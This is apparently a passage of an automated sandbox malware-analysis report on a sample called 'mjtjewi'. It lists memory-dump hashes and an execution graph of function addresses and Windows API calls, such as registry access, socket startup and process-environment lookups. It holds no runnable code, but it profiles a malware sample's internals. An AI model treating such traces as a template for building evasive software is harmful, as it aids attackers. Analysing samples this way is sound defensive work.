                                                          • Opcode ID: 9d84e8105cccfc9588c352f5520d9a0cc9e885257c6c31221c8604aedc91118d
                                                          • Instruction ID: ae495f6678e10e3ebf172343419764cd9a8dfbbfcfcf0988e50e5e133886d432
                                                          • Opcode Fuzzy Hash: 9d84e8105cccfc9588c352f5520d9a0cc9e885257c6c31221c8604aedc91118d
                                                          • Instruction Fuzzy Hash: FD61F775E05618CFDB14CF6AC980A9EFBF2BF89310F14C4AAD408AB265D7349985CF52
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 049469a0a227c7668de1925d0dfccd81a09cbd9a839ae76ca2cb7549cab81420
                                                          • Instruction ID: b11477f947242c29206dd18ebd94331d5685340f90b71037be96211836a7dcc8
                                                          • Opcode Fuzzy Hash: 049469a0a227c7668de1925d0dfccd81a09cbd9a839ae76ca2cb7549cab81420
                                                          • Instruction Fuzzy Hash: B5C13D74E052299FCB14CFA9D580AAEFBF2BF89300F24856AD409AB355D730AD41CF61
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 667382bb8987f7225531b146060fc769da4eadd83861665965689354e0e5eb5c
                                                          • Instruction ID: a73ce408d8f27d865a64380d1c390627f8259ebf0c2660deae074437015c42f3
                                                          • Opcode Fuzzy Hash: 667382bb8987f7225531b146060fc769da4eadd83861665965689354e0e5eb5c
                                                          • Instruction Fuzzy Hash: 10B1D674E1121A9FDB44DFA8D880ADEFBB2FF88304F108669D515AB355DB30A946CF90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 403f5e5121ef2d25489a62c3b12e8c74550a3a231455c434544e9e4177eb36dc
                                                          • Instruction ID: 89e96de23ba55c3020486e2092f15e3c64f39f285ba21298e448c2c9e99976e2
                                                          • Opcode Fuzzy Hash: 403f5e5121ef2d25489a62c3b12e8c74550a3a231455c434544e9e4177eb36dc
                                                          • Instruction Fuzzy Hash: 3EA17B74E052599FCB10CF69C894A9EBFF2BF89304F25C1AAD448AB216D730A941CF61
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 022fbc8588c707b03df3011127f622b107411d3430aaed0e383b54fb79cdec85
                                                          • Instruction ID: 4b77a6de122501290a2e86efe92b0817a7273d327bd32afda897b7ea2bc50fb1
                                                          • Opcode Fuzzy Hash: 022fbc8588c707b03df3011127f622b107411d3430aaed0e383b54fb79cdec85
                                                          • Instruction Fuzzy Hash: 48A10974E142199FCB14CF69C984AAEFBF2FF89304F25D1A9D409A7215D730AA81CF60
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec7321242c471382df0095857e361de79fd36490d6c2886c308a80f6fb6c2726
                                                          • Instruction ID: e93bd600a0d2629ecc8934ca57c65870e2825604d4db06ba018d50a88be4fb54
                                                          • Opcode Fuzzy Hash: ec7321242c471382df0095857e361de79fd36490d6c2886c308a80f6fb6c2726
                                                          • Instruction Fuzzy Hash: 14712575E05219DFCB48CF99D5809AEFBB2FB8A310F14856AD516AB350D3389A42CF90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6de8e1f31d4dcce4d501c0153106e8f9515da66ec3f101c05cccf90ed8f068e7
                                                          • Instruction ID: cf6c95b53807c6892a371fe95a214bcd9ca9b2ff60d9f297cd4f8e7eaa064031
                                                          • Opcode Fuzzy Hash: 6de8e1f31d4dcce4d501c0153106e8f9515da66ec3f101c05cccf90ed8f068e7
                                                          • Instruction Fuzzy Hash: 84711F74E112099FCB48CFA9E48499EFBF1FF89210B15D16AE859AB320D730AA41CF54
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90ad251b35a2d687142a6d0252df839ed4a506339e2b13cc3f602360a4d95bad
                                                          • Instruction ID: 9b49f81bf9fbbb16c7a4670c17935551f96190fa5c88b7e69414b6fbcec824c3
                                                          • Opcode Fuzzy Hash: 90ad251b35a2d687142a6d0252df839ed4a506339e2b13cc3f602360a4d95bad
                                                          • Instruction Fuzzy Hash: FB71F470E05209CFCB44CFA9D5806DEFBF2EF88214F25942AD505BB324D734AA41CB68
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65060e701346ce5eca063bf0e3aef884965fa2a6be66ea881c9743f40326fd62
                                                          • Instruction ID: 51e8721a85fa330ee9bcf0605230ba2e040c4e9d1c10c1408832f5fadfecc63a
                                                          • Opcode Fuzzy Hash: 65060e701346ce5eca063bf0e3aef884965fa2a6be66ea881c9743f40326fd62
                                                          • Instruction Fuzzy Hash: F571F370E15209CFCB44CFA9D5806DEFBF2EB88214F24942AD515BB324D734AA41CF68
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8881cc0cb2093aca6a1ba6584e0b5ce76907c25d421d929df4056b018c94fba8
                                                          • Instruction ID: 984675d9d49be8278bcb148473c3b51c34ef9c1c1633c5c64ad3e32aaad24dfe
                                                          • Opcode Fuzzy Hash: 8881cc0cb2093aca6a1ba6584e0b5ce76907c25d421d929df4056b018c94fba8
                                                          • Instruction Fuzzy Hash: 7C6127B0E04209DBCB44CFA5D9809EEFBB2FF49304F25905AE565A7704D3349A42CF98
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 206b570a9dbdf7ca51e560243015b7a96e09577c24cb90b4fc9dd5c2625b7e6c
                                                          • Instruction ID: d2b753a36e34e43ad4281992a73ad6fff1c67c21ecda567efc5cc32275e6edcf
                                                          • Opcode Fuzzy Hash: 206b570a9dbdf7ca51e560243015b7a96e09577c24cb90b4fc9dd5c2625b7e6c
                                                          • Instruction Fuzzy Hash: 4471DD74E112099FCB48CFA9D48499EFBF1FF88210F25D56AE919AB320D734AA41CF54
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee1422e8880aa859e07eadba91d8c2e33266693beaaf6ea34cb07b62519858b9
                                                          • Instruction ID: 23e825c300c14556f293e000c44022ce77d917ee315e9742e4aa502678d50ed0
                                                          • Opcode Fuzzy Hash: ee1422e8880aa859e07eadba91d8c2e33266693beaaf6ea34cb07b62519858b9
                                                          • Instruction Fuzzy Hash: 22510670E1524ACFCB44CFA9C5815AEFBF2AF8A314F25956AC509B7214D3349A41CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3855873f544204de7c28b68857672be761c64f4aced0b450a921aa3b265fd2ff
                                                          • Instruction ID: 3fd77bd4243ba5ba67cd764c99196f5721bd4eef232915851bc8bd9efdc8735b
                                                          • Opcode Fuzzy Hash: 3855873f544204de7c28b68857672be761c64f4aced0b450a921aa3b265fd2ff
                                                          • Instruction Fuzzy Hash: B35106B0E1520ACBCB44CFA9C5815AEFBF2BB89310F25D16AC509B7314D7349A41CBA8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2859a6fd74a87790c7944ae3678781fcd444ee3d8f40bbc304532429cc42983
                                                          • Instruction ID: 1cd20a92cb25fda3aa6585c239314f206f65eb410ed42be22a2e5051b0125679
                                                          • Opcode Fuzzy Hash: c2859a6fd74a87790c7944ae3678781fcd444ee3d8f40bbc304532429cc42983
                                                          • Instruction Fuzzy Hash: C641E8B0E0560A9BCB44CFA9C8815AEFBF2FF8C304F25D06AC915A7314E3349A41CB95
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2adcf235010d810b7143a480963e8d74c7dfc23fdc415348a7a9e62751ecf0c0
                                                          • Instruction ID: e49e5391aa156d0c2b7a05f4f6307536b00e82122cad08f117854d3c0415c8ff
                                                          • Opcode Fuzzy Hash: 2adcf235010d810b7143a480963e8d74c7dfc23fdc415348a7a9e62751ecf0c0
                                                          • Instruction Fuzzy Hash: B3410BB5E0521ADFCF44CFA9C5805AEFBF2FF89300F24C56AC905AB254D3309A458B94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21bbda68df1e1dceb297bce01e222e4bace10bc3586b4faa6ac2f1e9ddb72c2e
                                                          • Instruction ID: 82de0aaf551eb4293417aa32eee6e79e30e670219921bb43216b65896e5b72ff
                                                          • Opcode Fuzzy Hash: 21bbda68df1e1dceb297bce01e222e4bace10bc3586b4faa6ac2f1e9ddb72c2e
                                                          • Instruction Fuzzy Hash: 36416A70E15218AFDB58CF69D985BDEFBB6BF88200F00C0AAD508A7315D7309A42CF51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ff4b148f2fec6e44ff37f82b6575298d863bc9077b9a3637692d6fb2432ec6e
                                                          • Instruction ID: 21d00d307ebc8f1ac9846f9f36502dc2c03652bb6f5b7ba5f4ea9d8065f1b231
                                                          • Opcode Fuzzy Hash: 4ff4b148f2fec6e44ff37f82b6575298d863bc9077b9a3637692d6fb2432ec6e
                                                          • Instruction Fuzzy Hash: C44109B1E0561A9FDB48CFA9C4815EEFBF2BF89310F14C46AC915AB254D7349A428F90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1665a4ab09ef84a91f2004db0aa8f402b44ff02627063186cb5c4df0926e02ef
                                                          • Instruction ID: 5070859db12bd441ffa6d5c16f02f5cc1bc39853e2de6ef2c1204eac390c1fdb
                                                          • Opcode Fuzzy Hash: 1665a4ab09ef84a91f2004db0aa8f402b44ff02627063186cb5c4df0926e02ef
                                                          • Instruction Fuzzy Hash: AC410BB5E0561ACFCF44CFA9C5805AEFBF2BF89300F24C569C905AB354D7349A418B94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88cf15f9458c3833ef7897b25a328ec1ca04d9471223168630e1c81ceabcec71
                                                          • Instruction ID: 1e642d9bcf689ffd1c8a7506d80e33eff27dfaa9316b992bdd81869e19822cdf
                                                          • Opcode Fuzzy Hash: 88cf15f9458c3833ef7897b25a328ec1ca04d9471223168630e1c81ceabcec71
                                                          • Instruction Fuzzy Hash: 7F41C6B0E0560ADBCB44CFAAC5415AEFBF2FF8C204F24D16AC915A7314D7349A41CB95
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d1bc295c8df704f524dbab99f517bb68c7922e5b9a5f4ef8d708420fca56372
                                                          • Instruction ID: 66496660856587e1469ef7159c03f609909d79204f951e68726578c9b74e4f1d
                                                          • Opcode Fuzzy Hash: 3d1bc295c8df704f524dbab99f517bb68c7922e5b9a5f4ef8d708420fca56372
                                                          • Instruction Fuzzy Hash: 4C41F6B1E0461A9FDB08CFAAC4415EEFBF2BF89300F14C42AC915AB254D7349A428F94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcbb431c0881dc289007f92c36cdf37e172eac2a8eb61aa4f10f1de7859314f8
                                                          • Instruction ID: 877d7189612bc54dca4b9b5e6669bc61d54fc3b132d96180dddfcd2471fa6f70
                                                          • Opcode Fuzzy Hash: fcbb431c0881dc289007f92c36cdf37e172eac2a8eb61aa4f10f1de7859314f8
                                                          • Instruction Fuzzy Hash: 16311971E056189FEB68CF2ACC447DAFAB6FBC9300F14C0BAD40CA7214EA305A859F50
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca7c6d10866a3ee55173b5869a5ce4e0ce3520ece00630ca92f66bc0735a0dca
                                                          • Instruction ID: cf3865240d1c7bca1a0dcb58980aeb119409194925536818f306b001b7beda6f
                                                          • Opcode Fuzzy Hash: ca7c6d10866a3ee55173b5869a5ce4e0ce3520ece00630ca92f66bc0735a0dca
                                                          • Instruction Fuzzy Hash: 9D413970E11218AFDB58CF6AC989B9EFBF6BF88300F15D06A9508A7354D7309A81CF51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f8a3985aa9a30be0a6184e3bbe85e4ceb0ea60ce07cd235201331145e31db84
                                                          • Instruction ID: 53fd2634722653f28a1837068fd6fa24cf7b3eafb0a608919b2c1a956528ba0f
                                                          • Opcode Fuzzy Hash: 2f8a3985aa9a30be0a6184e3bbe85e4ceb0ea60ce07cd235201331145e31db84
                                                          • Instruction Fuzzy Hash: 08310A71E056189BDB68CF6ACD407DAF7B7ABC9311F44C1FA890CE7214DA305A858F44
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b016dd2dc5096a5005683631ec96b741abf2adbad3e9fdbd643f5c911fa7bbe
                                                          • Instruction ID: 5dc0b72a984e5efbb4c508810ca867b88202c931de030809ad291a948d4d7d6b
                                                          • Opcode Fuzzy Hash: 1b016dd2dc5096a5005683631ec96b741abf2adbad3e9fdbd643f5c911fa7bbe
                                                          • Instruction Fuzzy Hash: 78215E71D097949FDB1ACF368C5068ABFF7AFC6200F08C0E689489B266DE3459469F10
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05aaa15b4a21cd9cff30d09940fd31be3d20e08738760a098742014dad0af32e
                                                          • Instruction ID: 157e19dfc3b01b127079e2563bca2863b1faa2c69d49e2f332edda6a2f32a5f0
                                                          • Opcode Fuzzy Hash: 05aaa15b4a21cd9cff30d09940fd31be3d20e08738760a098742014dad0af32e
                                                          • Instruction Fuzzy Hash: 2B1106B1E116189BDB48CFAAD9406DEFBF7AFC8200F14C17AD508A7354EB305A418B95

                                                          Execution Graph

                                                          Execution Coverage:3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:1.3%
                                                          Total number of Nodes:302
                                                          Total number of Limit Nodes:13
                                                          execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 